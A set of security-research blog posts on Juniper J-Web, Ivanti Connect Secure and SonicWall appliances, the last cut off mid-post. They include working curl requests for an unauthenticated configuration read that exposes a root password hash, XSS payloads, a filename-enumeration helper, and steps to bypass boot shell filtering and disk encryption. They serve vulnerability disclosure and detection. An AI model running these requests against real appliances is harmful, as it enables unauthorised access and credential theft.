
The Second Wednesday Of The First Month Of Every Quarter: Juniper 0day Revisited

18 January 2024 at 07:38

Who likes vulnerabilities in appliances from security vendors? Everyone loves appliance vulnerabilities! If, by 'everyone', you mean various ransomware and APT groups of course (and us).

Regular watchTowr-watchers (meta-towr-watchers?) will remember our previous blog post on Juniper's CVE-2023-36844 (and friends), in which we tore J-Web - Juniper’s typical appliance web interface - apart, and rearranged the pieces to form an RCE exploit for the aforementioned CVEs. That group of vulnerabilities went on to become some of 2023’s superstars, as discussed by our friends here:

But, as famous scientists, lawyers and judges have always said: “where there’s smoke, there is fire”. It’s just science.

In the process of our adventures into playing with security appliances that for some reason use PHP interfaces, we actually found more fire. Being the Internet-friends that we are, we duly reported these vulnerabilities to Juniper, who have been working on them ever since.

They did request that we extend our usual 90-day VDP window, and embargo the vulnerabilities until the 11th of January - to align with their release schedule.

For reasons only known to some, Juniper release security advisories in quarterly cycles, taking place on “the second Wednesday of the first month of every quarter”, which recently fell upon the 10th of January.

This strikes us as an odd schedule, given the cadence of the security world in general - we went looking to see if this aligned with certain star formations, or perhaps the location of the moon.

Not finding much fruit in that pursuit, we were forced to conclude that this is likely driven by business reasons - such as the difficulty of QA’ing fixes over a broad and somewhat fragmented combination of OS and hardware - which require that trade-off in responsiveness.

Despite these vulnerabilities being serious enough to require confidentiality during this extended period, Juniper didn’t view them as serious enough to warrant an out-of-cycle advisory or to consistently register CVE numbers (or even to mention them in the patch notes). [Update! Juniper have now done so - see the 'update' section at the end of the post]

But fear not, all the details you could need are contained in this blog post! There are four vulnerabilities in total, ranging in severity.

Let's dive in and take a look - they're good examples of subtle vulnerabilities creeping into a product that obviously has a long legacy behind it. Seemingly simple operations (such as 'format this error message nicely') turn into hazardous calls and enable XSS - and just as innocently, loading an arbitrary file from the file system turns into arbitrary file read.

For the purposes of this research, we looked at version 22.4R2.8 of JunOS.

The Main Course: Authentication Is Optional

Few words will catch an attacker's attention like the combination of these two - "missing authentication". Often the easiest vulnerabilities to exploit, they're beloved by everyone from script-kiddies through to APT groups, and with good reason.

Here, we have a classic case of missing authentication, as requesting a particular URL will enable us to read various temporary files, created by other users, which contain sensitive information.

During the normal course of operation - when an administrative user logs in - various temporary files are created, containing varying levels of sensitive information. The most juicy temporary file contains the entire system configuration, with everything from routing tables and IP data through to the encrypted device password.

You might be thinking - “this is a pretty disastrous file on which to omit authentication” - but please remember that we are discussing an appliance from a security vendor and thus we have to expect the bar to be lower.

Fortunately for defenders, requesting this file does require that the correct filename - containing a number - be requested.

It is unclear, however, how that number is generated, and our observation suggests it is generated in a cryptographically insecure manner (for example, we've seen it increment by one when a new user authenticates).

We have a suspicion, but we’ll leave this challenge to the reader (and for fear of another KEV awardee).
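If that number really does increment by one per login, the search space is trivially small - a sketch of how an attacker might enumerate nearby candidates (the filename pattern below matches the one we observed in our test environment; the generation scheme itself remains an assumption):

```python
def candidate_names(seed: int, user: str = "root", window: int = 50) -> list[str]:
    """Hypothetical: if the per-login number increments by one, values near a
    previously observed (or guessed) seed are worth probing."""
    return [f".{seed + i}_{user}_cfg.json" for i in range(-window, window + 1)]

# e.g. around the value seen in our test environment:
candidates = candidate_names(1136517270)
```

Each candidate would then be submitted as the force parameter of the stream_file_data request - a hundred-odd requests, well within any attacker's patience.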

$ curl --insecure -X $'POST' \
       --data-binary $'method=stream_file_data&force=.1136517270_root_cfg.json' \
       $'https://hostname/cache'
<html>
    <head></head>
    <body>
    <h5>Your session has expired. <a href="" onclick="return redirectToLogin(this);" style="color: blue;"> Click </a> to redirect to login page</h5>
    <script type="text/javascript">
        function redirectToLogin() {
            window.parent.location.href = "/";
            return false;
        }

        var response = confirm("Your Session has expired. Click OK to redirect to login page.");
        if(response)
            redirectToLogin();
        </script>
    </body>
    </html><?xml version="1.0" encoding="us-ascii"?>
<junoscript xmlns="http://xml.juniper.net/xnm/1.1/xnm" xmlns:junos="http://xml.juniper.net/junos/22.4R0/junos" schemaLocation="http://xml.juniper.net/junos/22.4R0/junos junos/22.4R0/junos.xsd" os="JUNOS" release="22.4R2.8" hostname="" version="1.0">
<!-- session start at 2023-09-26 16:22:25 UTC -->
<!-- No zombies were killed during the creation of this user interface -->
<!-- user root, class super-user -->
<rpc-reply xmlns:junos="http://xml.juniper.net/junos/22.4R0/junos">
{
    "configuration" : {
        "@" : {
            "junos:changed-seconds" : "1695144013",
            "junos:changed-localtime" : "2023-09-19 17:20:13 UTC"
        },
<truncated for brevity>

You can see here that we have requested the cache page, and the result is an HTML error page - but following that error page HTTP response is the output of JunOS's RPC mechanism, containing the appliance configuration. Yes... resilience...

It contains oodles of information, including the appliance root password hash:

...
        "system" : {
            "root-authentication" : {
                "encrypted-password" : "$6$36tD63Su$onV8mCOl5HAF2Z1sktp7Vu1ROKD1YJaGTLVNo5DSATHZ3YqCtcKy2e3tfgvhwFxP9WG5Mp9UA3ex11JGtIO/10"
            }
        }
...

That's not cricket!

Recovery of the plaintext of this hash allows an attacker to log in to the Juniper appliance via a myriad of interfaces - J-Web itself, SSH, and more.

“Thankfully”, it uses SHA-512 (at least in our test environment), which is at least a secure hashing mechanism - but again having only the strength of a hashing mechanism to give you some comfort about the security of your appliance leaves a lot to be desired.
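The `$6$` prefix is what identifies the scheme: in the modular crypt format, the fields between the `$` separators are the hash identifier (`6` = sha512-crypt), the salt, and the digest. A quick parse (standard format handling, not Juniper-specific code):

```python
def parse_crypt(mcf: str) -> tuple[str, str, str]:
    """Split a modular-crypt-format string into (scheme id, salt, digest)."""
    _, scheme, salt, digest = mcf.split("$")
    return scheme, salt, digest

scheme, salt, digest = parse_crypt(
    "$6$36tD63Su$onV8mCOl5HAF2Z1sktp7Vu1ROKD1YJaGTLVNo5DSATHZ3YqCtcKy2e3tfgvhwFxP9WG5Mp9UA3ex11JGtIO/10"
)
# scheme "6" marks sha512-crypt; "36tD63Su" is the salt
```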

Given the current state of security appliances - this seems fairly serious and we'd love to understand what does meet the bar for Juniper's out-of-band patch servicing. Maybe a customer can ask?

Side-Dishes: Two-And-A-Half XSS

Our first side-dish vulnerability (assigned CVE-2023-36846 when we reported it in September) simply allows us to upload an arbitrary file to the server, and fetch it later on.

This is almost an XSS (allowing us to plant JavaScript for an unsuspecting administrator to later execute), but is saved by one detail - the filename served is dependent on the currently logged-in user, rendering it useless for privilege escalation.

To demonstrate this flaw, do a POST request to the user.php endpoint as shown below, supplying some data in the body of the request:

$ curl --insecure -X $'POST' \
       --data-binary $'watchTowr' \
       $'https://hostname/slipstream/preferences/user.php'

{"status": "Error - Internal error. Cannot identify user."}{"status": "Success - Updated preferences for user"}

The conflicting error message suggests something has gone wrong, and indeed, it has. Requesting the same URL endpoint with a GET will cause the server to cough up the data we planted:

$ curl --insecure $'https://hostname/slipstream/preferences/user.php'

{"status": "Error - Internal error. Cannot identify user."}watchTowr

While in isolation this seems quite low-impact, we still view this as a lapse in integrity for an appliance that purports to have security purposes.

Two of the other side dishes are in a similar vein (but without CVE identifiers assigned), allowing an attacker to upload arbitrary data via POST data and display it in an unsafe manner.

Both vulnerabilities are within the webauth_operation.php endpoint (which we note Juniper now appears to have completely rm'd).

The first is within the emit_debug_note method, which will echo back the POST data it receives, wrapped in some HTML elements:

$ curl --insecure -X $'POST' \
       --data-binary $'rs=emit_debug_note&rsargs[]=a&rsargs[]=device is on fire' \
       $'https://hostname/webauth_operation.php'
+:<h3><b>ERROR: device is on fire</b></h3><br><br><div style="text-align: left; font-family: monospace;"></div>''

However, we can embed HTML (and thus javascript) in there too:

$ curl --insecure -X $'POST' \
       --data-binary $'rs=emit_debug_note&rsargs[]=a&rsargs[]=<script>alert(\'XSS\');</script>' \
       $'https://hostname/webauth_operation.php'
+:<h3><b>ERROR: <script>alert('XSS');</script></b></h3><br><br><div style="text-align: left; font-family: monospace;"></div>''


The second is almost the same, with similar behavior caused by a different function in the same endpoint (sajax_show_one_stub):

curl --insecure -X $'POST' \
     --data-binary $'rs=sajax_show_one_stub&rsargs[]=ab<script>alert(\'watchTowr\');</script>' \
     $'https://hostname/webauth_operation.php'
+:
                // wrapper for ab<script>alert('watchTowr');</script>
                function x_ab<script>alert('watchTowr');</script>() {
            sajax_do_call("","ab<script>alert('watchTowr');</script>",
                                x_ab<script>alert('watchTowr');</script>.arguments);
                }

                ''
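In both cases the root cause is the same: attacker-controlled text is interpolated into the response without escaping. For the reflected-HTML case, the conventional fix is contextual output encoding - the endpoint is PHP (where htmlspecialchars() serves this purpose), but the behaviour is easy to sketch in Python:

```python
import html

payload = "<script>alert('XSS');</script>"
unsafe = f"+:<h3><b>ERROR: {payload}</b></h3>"              # what the endpoint does today
safe = f"+:<h3><b>ERROR: {html.escape(payload)}</b></h3>"   # escaped before interpolation
```

The sajax stub case additionally reflects into a JavaScript identifier context, where escaping alone is not sufficient - the input should be validated against the small character set a function name can legitimately contain.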

Closing Words

It's interesting how vulnerabilities seem to 'cluster' - in this case, while chasing a single vulnerability, we spotted a few different vulnerabilities in related code.

You'll probably be relieved to know (depending on your agenda) that Juniper has released fixes for all these issues. Juniper advise that while they haven't yet applied for a CVE ID, the first of our vulnerabilities is tracked as PR 1763260. It affects 'all versions of JunOS', and it is fixed in the following releases:

  • 20.4R3-S9
  • 21.2R3-S7
  • 21.3R3-S5
  • 21.4R3-S6
  • 22.1R3-S5
  • 22.2R3-S3
  • 22.3R3-S2
  • 22.4R3
  • 23.2R1-S2
  • 23.2R2
  • 23.4R1

Likewise, Juniper advise they have not assigned CVE IDs for the two XSS vulnerabilities as of today. These vulnerabilities affect JunOS from version 22.4R1 onward, with the following versions containing fixes:

  • 22.4R2-S2
  • 22.4R3
  • 23.2R1-S2
  • 23.2R2
  • 23.4R1

Finally, the 'missing authentication' vulnerability. Juniper again advise that this affects 'all versions of Junos'. Fixes are available for various versions of JunOS:

  • 20.4R3-S9
  • 21.3R3-S5
  • 21.2R3-S7
  • 21.4R3-S6
  • 22.1R3-S5 (due to be released 1st Feb 2024)
  • 22.2R3-S3
  • 22.3R3-S2
  • 22.4R3
  • 23.2R1-S2
  • 23.2R2
  • 23.4R1

You may note that those users who require 22.1R3-S5 are left out in the cold, as patches for this version aren't available until the first of February. Juniper comment that "[we] have fixes available .. except for one release .. which we think is tolerable".

We can only hope this decision aligns with the threat model of Juniper's customer base.

As we mentioned previously - Juniper usually publish advisories on “the second Wednesday of the first month of every quarter”, which seems a strange schedule given how urgent security updates tend to be. We’ve often stated that a vendor’s response to vulnerabilities such as these can be critical in closing their clients’ ‘window of vulnerability’.

Given this, it is interesting that Juniper did not find at least the missing authentication vulnerability to be severe enough to justify an out-of-cycle advisory, nor to register CVEs or mention them in the release notes (although they did deem them important enough to request we delay our usual and industry-aligned 90-day VDP timeline). [Update - Juniper have now done this and provided additional explanation, see below for details]

This is what we do every day for our clients - if you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Timeline

Date Detail
16th September 2023 Initial report to Juniper
16th September 2023 watchTowr hunts for vulnerable appliances across client attack surfaces, and provides mitigation advice under confidentiality
7th November 2023 Juniper details fixes, requests disclosure extension until 11th January 2024
28th November 2023 watchTowr grants extension, requests additional information from Juniper
6th December 2023 watchTowr repeats previous request for additional information
11th January 2024 Coordinated disclosure date
18th January 2024 Ivanti happened, so watchTowr delayed disclosure
30th January 2024 Juniper publishes CVE and JSA disclosure (see below)

Update: 30th Jan 2024

After some pressure, Juniper have now issued CVE-2024-21619 and CVE-2024-21620, and noted "two additional vulnerabilities that had been addressed in JSA72300" (presumably we re-discovered bugs that they fixed while addressing JSA72300, deliberately or otherwise). They've also issued an out-of-cycle bulletin documenting these bugs and their fixes, and communicated via email their apologies for poor communication. They comment that "Our assessment of the vulnerabilities reported by you has changed", which explains the out-of-cycle advisory they previously concluded to be unnecessary.

They also explained that, due to non-technical reasons, they typically apply for CVE late in the reporting cycle, a process they have since reviewed, and state that their original intention was to apply for CVE (and publish a JSA) once fixes were available for all supported releases.

Welcome To 2024, The SSLVPN Chaos Continues - Ivanti CVE-2023-46805 & CVE-2024-21887

13 January 2024 at 11:48

Did you have a good break? Have you had a chance to breathe? Wake up.

It’s 2024, and the chaos continues - thanks to Volexity (see Volexity’s writeup), the industry has been alerted to in-the-wild exploitation of two incredibly serious 0days in Ivanti (also known as Pulse Secure) Connect Secure (ICS) and Ivanti Policy Secure appliances - CVE-2023-46805, an Authentication Bypass, and CVE-2024-21887, a Command Injection - facilitating a full-device compromise and takeover.

CVE-2023-46805 & CVE-2024-21887 have been widely reported in the media as being utilised by nation-state-linked APT groups to compromise Ivanti appliances.

We’ve made it no secret - we (watchTowr) hate SSLVPN appliances. Not the concept of them, but that they all appear to have been constructed with the code equivalent of string, stamped with the word ‘secure’ and then just left to decay for 20 years.

What makes this situation even more “offensive” is Ivanti’s response (or lack thereof) to these vulnerabilities, especially given the context - at the time of writing, a mitigation XML file is all that is available, with staggered patches available from the 22nd Jan 2024 per Ivanti. Yes, really.

We’re tired of the lack of responsibility taken by organisations when their devices are the literal gate between the Internet and their internal networks, and hold an incredibly critical and sensitive position in any network architecture.

Here at watchTowr, our job is to tell the organisations we work with whether they’re affected. Thus, we dived in.

If you haven’t read Volexity’s write-up yet, I’d advise reading it first for background information.

What Are The Bugs

As we stated earlier, there are two bugs at play here:

  • CVE-2023-46805 and,
  • CVE-2024-21887

Both are chained together: CVE-2023-46805 allows an unauthenticated Internet-based attacker to bypass authentication and reach administrative functionality, while CVE-2024-21887 allows Command Execution via Command Injection within that vulnerable administrative functionality.

Ivanti has tried very hard to make understanding these vulnerabilities as difficult as possible, distributing only an XML ‘mitigation’ within a private customer portal, and providing no actual patch yet.

Our Approach To Deciphering

Our usual approach with this kind of bug is straightforward - copy all the files from the target appliance, apply the patch, and then compare files. The fixes should make themselves known in the diff, or so the theory goes.
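As a sketch, the 'compare' step can be as simple as a recursive directory walk over the two mounted images (illustrative Python, demonstrated here on two throwaway directory trees standing in for the before/after filesystems):

```python
import filecmp
import os
import pathlib
import tempfile

def changed_paths(old_root: str, new_root: str) -> list[str]:
    """Recursively collect files that differ, or exist on only one side."""
    diffs: list[str] = []
    def walk(cmp: filecmp.dircmp, rel: str = "") -> None:
        for name in cmp.diff_files + cmp.left_only + cmp.right_only:
            diffs.append(os.path.join(rel, name))
        for name, sub in cmp.subdirs.items():
            walk(sub, os.path.join(rel, name))
    walk(filecmp.dircmp(old_root, new_root))
    return sorted(diffs)

# Tiny demonstration: two throwaway trees standing in for the two images
before, after = tempfile.mkdtemp(), tempfile.mkdtemp()
pathlib.Path(before, "unchanged.conf").write_text("same contents")
pathlib.Path(after, "unchanged.conf").write_text("same contents")
pathlib.Path(before, "patched.cgi").write_text("old handler")
pathlib.Path(after, "patched.cgi").write_text("new, fixed handler")
pathlib.Path(after, "added.sig").write_text("new file")
```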

In this case, there is:

  • No actual patch
  • An (encrypted) mitigation XML only

As we dived in, we noted that our approach was hampered slightly by the full-disk encryption that Ivanti use to secure their product - we can’t simply boot into another OS and mount the disks, as they are encrypted with LUKS. Our usual approach would be to extract FDE keys from GRUB, which would typically mount the root device before passing execution to the kernel, but in this case, this was fruitless.

Some further investigation revealed that even the initrd booted is encrypted, which is interesting in itself, and suggests that the kernel itself has been modified to decrypt the image on the fly.

The first thing to try here is the old-faithful init=/bin/sh kernel command line argument, which will, when passed from GRUB, start a shell on the target just after the initrd has been mounted. Once the initrd is mounted and we have a shell, we can simply observe the encryption keys and use them to cold-mount the disks.

Frustratingly, though, attempts to do this were ignored by the appliance, again suggesting a custom kernel. Time to look at that kernel a little closer.

What’s this we see?

__int64 __fastcall sub_FFFFFFFF826CC601(unsigned __int8 *a1)
{
  __int64 i;

  if ( strcmp(a1, "/bin/sh") )
    qword_FFFFFFFF827E2030 = a1;
  for ( i = 0LL; i != 31; ++i )
    qword_FFFFFFFF82212168[i] = 0LL;
  return 1LL;
}

is… is that a blacklist on the term /bin/sh?! Really?! What a bizarre check. It’s easily bypassed, of course, by specifying a slightly different (but equivalent) argument (such as //bin//sh).
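The bypass works because the check is a literal string comparison while the kernel's path handling collapses repeated slashes. A toy illustration of the mismatch (our own sketch, not the vendor's code):

```python
import re

def naive_block(arg: str) -> bool:
    """Mimics the strcmp()-style check above: rejects only the exact string."""
    return arg == "/bin/sh"

def collapse_slashes(path: str) -> str:
    """Roughly what path resolution does: '//bin//sh' names the same file as '/bin/sh'."""
    return re.sub(r"/+", "/", path)
```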

Doing so drops us right into a recovery shell, where we can find the FDE keys in /etc/lvmkey, which can then be used to mount the encrypted partitions.

Our approach then is fairly simple - an image of a vulnerable device, an image of a mitigation-applied device, and.. compare!

Unfortunately for us, however, doing so reveals no useful changes between the ‘mitigation XML-applied’ appliances and the vulnerable appliances. Time to try a different tactic.

Perhaps instead of trying to diff our way to the answer ourselves, we should be paying more attention to the breadcrumbs the vendor has left for us. Let’s take a closer look at the advice that Ivanti has for applying the workaround.

Well, Ivanti’s documentation for the mitigation warns that (among other things) “Automation built with REST API for configuration and monitoring will be impacted”.

Perhaps we should shift our focus there - what can we see that’s changed in the REST API? Let’s fire off a bunch of requests to a ‘patched’ and a ‘vulnerable’ VM, and see if we can spot any divergences.

[Screenshot: API response - “Access to the Web site is blocked by your administrator.”]

Aha! This is looking more like it!

There are a handful of API endpoints that now respond with the above message, stating that access has been ‘blocked by your administrator’, instead of their usual response.

It seems like we’ve found the endpoints that have been restricted by the patch.

Editors note: All details from this point onwards have been redacted due to some inner feeling of moral responsibility that has crept up on us, and not wishing to even possibly add to the current barrage of exploitation that neighbourhood APTs are in the midst of.

Detection Approach

It’s important to note here that these changes in API behaviour happen before any authentication has been carried out, which is a massive help for defenders - given this information, it is straightforward to detect appliances that have had the patch applied without needing to authenticate.

Requesting the endpoint /api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark without supplying any authentication info will respond with an empty 403 if the device is vulnerable:

$ curl -v https://host/api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark
...
< HTTP/1.1 403 Forbidden
< Transfer-Encoding: chunked
< X-XSS-Protection: 1
< Strict-Transport-Security: max-age=31536000
<

However, performing the same request on a mitigation XML-applied version yields a full HTML page, rendering as above:

$ curl -v https://host/api/v1/configuration/users/user-roles/user-role/rest-userrole1/web/web-bookmarks/bookmark
...
< HTTP/1.1 403 Forbidden
< Content-Type: text/html; charset=utf-8
< Connection: close
< Pragma: no-cache
< Cache-Control: no-store
< Expires: -1
< Content-Length: 3015
< Strict-Transport-Security: max-age=31536000
<
<!-- Copyright (c) 2022 by Ivanti Inc. All rights reserved -->

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name=robots content="none">
<link rel="icon" href="/dana-na/imgs/Product_favicon.png" type="image/png">
<title>Ivanti&#32;Connect&#32;Secure</title>

..truncated..

<div id="error_message_content"  class="intermediate__content">
Access to the Web site is blocked by your administrator. Please notify your system administrator. Made  request for $request to $host:$port

</div>

..truncated..

</html>
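Condensing the two responses above into a check: both endpoints return 403, but the vulnerable build sends an empty body while the mitigated build sends the HTML block page. A sketch of the classification logic (our own helper operating on an already-received response, not part of any official tooling):

```python
def classify(status: int, body: str) -> str:
    """Classify an unauthenticated response from the bookmark endpoint."""
    if status != 403:
        return "unknown"
    if "blocked by your administrator" in body:
        return "mitigation applied"
    if not body.strip():
        return "vulnerable"
    return "unknown"
```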

It is important to note that this is one of 'a few' detection mechanisms we've identified - but we hold a genuine concern that further sharing would ease the reproduction steps for bad actors that are likely also watching this situation.

Conclusion

Another day, another SSL VPN bug. Sigh.


It’s been a fun 48 hours for us - reproducing these vulnerabilities, building unauthenticated detection mechanisms and ensuring the attack surfaces we help protect aren’t affected.

We will share details - but while there is in-the-wild exploitation, and Ivanti has not even released a patch - it would be truly irresponsible of us to do so at this point. In this case, we leave you with the below image teasing the Command Injection vulnerability alone - just to keep you on the hook a little.

[Image: a teaser of the Command Injection vulnerability]

Our closing note would be that - and we’re sure there may be legitimate reasons - we are still more than a week away from an actual patch from a security vendor for a pair of vulnerabilities that are being used in the wild by nation-state-linked APTs.

But, as an industry, here we are. This is a disappointing place to be.

Once real patches are released, in our usual fashion we will be releasing further details in all their gory glory (you will cry with us at how ridiculous this all is).

Until then, please ensure you apply the mitigation.release.20240107.1.xml that Ivanti provides, and be careful out there - the APTs are looking for more vendors that don’t do basic security in their enterprise-grade products.

(P.S. Please also follow Ivanti’s advice and perform integrity checks on your device - applying the mitigation alone is not enough).

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about how the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, can support your organisation, please get in touch.

Ghost In The Wire, Sonic In The Wall - Adventures With SonicWall

20 October 2023 at 08:03

Here at watchTowr, we just love attacking high-privilege devices (and spending hours thinking of awful titles [see above]).

A good example of these is the device class of ‘next generation’ firewalls, which usually include VPN termination functionality (meaning they’re Internet-accessible by network design). These devices patrol the border between the untrusted Internet and an organisation’s softer internal network, and so are a great place for attackers to elevate their status from ‘outsiders’ to ‘trusted users’.


We’ve found in previous research projects that such devices usually drag behind them a legacy codebase, often full of vulnerabilities, weaknesses, unexpected behaviour, false positives and forgotten functionality.

Up until now, one vendor has escaped our eye - SonicWall, a company who (as the name suggests) center around firewalls and secure border devices. Fear not, SonicWall users, the time has come for your devices to be scrutinised!

Like previous devices we’ve looked at, SonicWall's NGFW series of physical and cloud routers is designed to sit at the border to a corporate network and, conceptually, filter traffic. It does this with a traditional firewall, with rapidly-updated IP and DNS-based blocklists, and via other more complex means, such as a traditional antivirus and ‘deep’ SSL inspection.

In order to inspect encrypted traffic, the device is often equipped with a CA TLS certificate, meaning easy MiTM attacks for an attacker who manages to break into the device. VPN functionality makes it even more interesting to an attacker, since the device is thus accessible by a large number of users and usually exposed to the entire Internet.

Clearly this is a device positioned as high-privilege and hardened.

As you can imagine, we foam at the mouth at the prospect of some nice juicy bugs in such devices. As researchers, these are the challenges that keep us going - finding bugs and weaknesses to help the red team position itself at the best possible angle, so defenders can have the most realistic view of their network landscape.

Can we find a way to elevate from a VPN user to exploit the privileged position of the router in the network, bypassing firewall rules and access policies? Could we find RCE, enabling MiTM attacks? No TLS connection is safe when the device holds a root CA cert!

Device Acquisition


Acquiring access to a SonicWall device was easy - as is the trend these days, SonicWall have a cloud-based device via EC2, and also provide a ‘free trial’ period for us to do our analysis. Smashing! We fire it up and get going. If you’re following along at home, we played with version 7.0.1-5111 build 2052.

Our first step was to take an image of the disks to examine them offline. This is where we hit our first roadblock.

Encrypted disks

SonicWall, it seems, decided to use full-disk encryption in their EC2 image, which is frustrating as a security researcher not because it prevents access, but because defeating it soaks up time that could be better spent doing actual analysis.

We can only speculate on SonicWall's motivation for doing so - perhaps some common audit requirement among their clients, an attempt to hinder tampering, or an effort to prevent counterfeit devices.

Fortunately, after some time, we found an excellent writeup (in Chinese, but we anglophones could figure out what was going on) on the topic of extracting the FDE keys, which suggests using a hypervisor’s debug features to set a breakpoint in the GRUB bootloader, which is responsible for mounting the disks (and thus has access to the FDE keys).

We applied this research to mount the disk partitions, and all seemed well - until we found one partition which we could not mount read-write, but would only mount read-only.

# cat key-p3 | cryptsetup luksOpen /dev/nvme0n1p3 p3
# cat key-p6 | cryptsetup luksOpen /dev/nvme0n1p6 p6
# cat key-p7 | cryptsetup luksOpen /dev/nvme0n1p7 p7
# cat key-p9 | cryptsetup luksOpen /dev/nvme0n1p9 p9
# mkdir /mnt/p3 /mnt/p6 /mnt/p7 /mnt/p9
# mount /dev/mapper/p3 /mnt/p3
mount: /mnt/p3: wrong fs type, bad option, bad superblock on /dev/mapper/p3, missing codepage or helper program, or other error.
       dmesg(1) may have more information after failed mount system call.
# mount /dev/mapper/p6 /mnt/p6
# mount /dev/mapper/p7 /mnt/p7
# mount /dev/mapper/p9 /mnt/p9

Why did partition 3 not mount? It’s definitely an ext3 partition:

# file --dereference --special-files /dev/mapper/p3
/dev/mapper/p3: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=39a04b61-3410-406d-8ee2-9a07635993e0 (large files)

Weird, huh? Fortunately dmesg gives us a clue:

# tail -n 1 dmesg
[  800.837818] EXT4-fs (dm-0): couldn't mount RDWR because of unsupported optional features (ff000000)

After some head-scratching, we realised that SonicWall took the additional step of setting the ‘required features’ flags in the ext4 filesystem to 0xFF (shown in the output of dmesg above). This tells the ext4 driver code that mounting the filesystem requires support for a whole bunch of features that don’t actually exist yet, and so, the ext4 driver errs on the side of caution and refuses to continue.

Presumably this is intended to prevent the SonicWall appliance from inadvertently mounting the partition read-write, rather than as a security measure.

To get around it, we can simply modify the partition’s flags, and then we can mount it:

# printf '\000' | dd of=/dev/mapper/p3 seek=$((0x467)) conv=notrunc count=1 bs=1
# mount /dev/mapper/p3 /mnt/p3

Once we’ve finished, we can restore the original flags:

# umount /dev/mapper/p3
# printf '\377' | dd of=/dev/mapper/p3 seek=$((0x467)) conv=notrunc count=1 bs=1
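Where does the magic offset 0x467 come from? Assuming the standard ext4 on-disk layout: the superblock starts at byte 1024, the s_feature_ro_compat field sits at offset 0x64 within it, and the dmesg error (ff000000) shows that only the top byte of that little-endian field is set - i.e. byte index 3:

```python
SUPERBLOCK_START = 1024      # the ext4 superblock begins 1 KiB into the partition
S_FEATURE_RO_COMPAT = 0x64   # offset of s_feature_ro_compat within the superblock
TOP_BYTE = 3                 # 0xff000000, stored little-endian, is byte index 3

offset = SUPERBLOCK_START + S_FEATURE_RO_COMPAT + TOP_BYTE
# offset == 0x467 - the byte the dd commands above overwrite and restore
```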

Et voilà - we have all the disk partitions mounted and can proceed to do our analysis.

First impressions

Once we’d sidestepped the disk encryption, our first impressions of the architecture were pretty positive, from a security point of view.

SonicWall made the decision to segment their offering via the rocket containerization platform, which can bring benefits to both manageability and security. We speculate that breaking out of the container is probably straightforward, due to the high-performance in-kernel packet switching code that the container has access to, although this was beyond the scope of our research (for now).

Like most devices in this class, the bulk of the application logic is in one large binary - the 95MB sonicosv binary. However, one thing that we found very useful is that SonicWall also ship a second binary, aptly named sonicosv.debug, which is approximately 50MB larger. While it is not a ‘debug’ binary in the sense that symbols are still stripped, it does contain a wealth of additional checks and logging functionality, which makes reversing the binary much, much easier.

There are also a bunch of seemingly-unused functions in the debug binary which make those long hours staring at a disassembler that little bit more amusing.

Me too, SonicWall, me too

First bugs

So typically, once we open up a large new codebase like this, we spend some time getting acquainted with the code.


A few hours turn into a few days, as we write IDAPython snippets to extract function names from log functions, we identify functions that might come in handy later on, and generally figure out what’s going on.

It’s rare, at this stage, that we discover any vulnerabilities - but in this case, something rapidly caught our eye:

[image: "Oooh, what's this?"]

A leet-speak encoded string, being fed into an encryption primitive?! Oooh! What could this be? Let’s take a look around.

char key[512];
__int64 IV[2];
char encryptedData[208];

queryStringData = parseQueryStringData(a2);
for ( i = queryStringData; i; i = *i )
{
  if ( !strcmp(i->paramName, "url") )
  {
    if ( logThingToSyslog("NOTICE", "dynHandleBuyToolbar", 12239LL) )
      sub_1FF1DBC("Encypted URL Data [%s]", i->paramData);
    dataLen = strlen(i->paramData) / 2;
    if ( !dataLen )
    {
      if ( logThingToSyslog("NOTICE", "dynHandleBuyToolbar", 12245LL) )
        sub_1FF1DBC("No query data", "dynHandleBuyToolbar");
      break;
    }
    toEncrypt = SWCALLOC(1LL, dataLen, "dynHandleBuyToolbar", 12249LL);
    if ( toEncrypt )
    {
      sub_27D4B82(i->paramData, toEncrypt, dataLen);
      memset(encryptedData, 0, 0x200uLL);
      aesInit(1LL, "D3lls0n1cwLl00", 16LL, expandedKey);
      IV = {0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15};
      do_aes_cbc_encrypt(toEncrypt, encryptedData, dataLen, expandedKey, IV, NULL);
      v32 = strlen(encryptedData);
      v28 = encryptedData[v32 - 1];
      if ( !is_asc(v28) )
        encryptedData[v32 - v28] = 0;
      if ( logThingToSyslog("NOTICE", "dynHandleBuyToolbar", 12286LL) )
        sub_1FF1DBC("new buy toolbar URL [%s] length [%d] new length [%d]", encryptedData, v32, v32 - v28, v14, v15);
      snprintf(byte_D564F80, 0x100uLL, "%s", encryptedData);
      saveRamPrefs();
      swFree(toEncrypt, "dynHandleBuyToolbar", 12290LL);
    }
  }
}
freeQueryStringData(queryStringData);

Oh wow, what’s going on here?! First off, we have the weak key we just happened upon. Then there’s a hard-coded IV, and - to top it off - it looks like there’s an overflow in the encryptedData buffer. Yikes!

What is this functionality, though? We couldn’t find any references to it in SonicWall's documentation, nor any way to activate it. After some thorough investigation, we concluded that it is likely related to this β€œcustomer requested enhancement”, which adds a demo banner to the top of the site.

[image: the release note describing the "customer requested enhancement"]

Try as we might, though, we couldn’t find a way to actually enable this functionality. We concluded that it either requires some arcane invocation, or that the code to enable it simply isn’t present in retail builds of the SonicWall software.

We suspected, at this point, that SonicWall’s β€œdemo” environment (in which an emulated SonicWall device is available publicly for prospective users to play with) may expose this code, but (for obvious legal and ethical reasons) we couldn’t probe the SonicWall site, and so our research into this bug ended here, with us reporting it to SonicWall's security team.

While we were somewhat uneasy about reporting a finding without being able to demonstrate the dire consequences of exploitation, SonicWall took the finding seriously and assigned it CVE-2023-41713.

It is interesting to note that SonicWall appear to have remediated the issue by removing this functionality entirely, suggesting it was indeed a half-baked solution to an extremely uncommon configuration used by the third-party vendor named in the secret. So, while we have a neat bug, it’s not β€˜world-ending’ - our appetites whetted, we continued our search for bugs.


SSLVPN, my old friend

With the flurry of excitement of our first find fading fast, we decided we’d focus our efforts on the SSLVPN functionality that the device exposes.

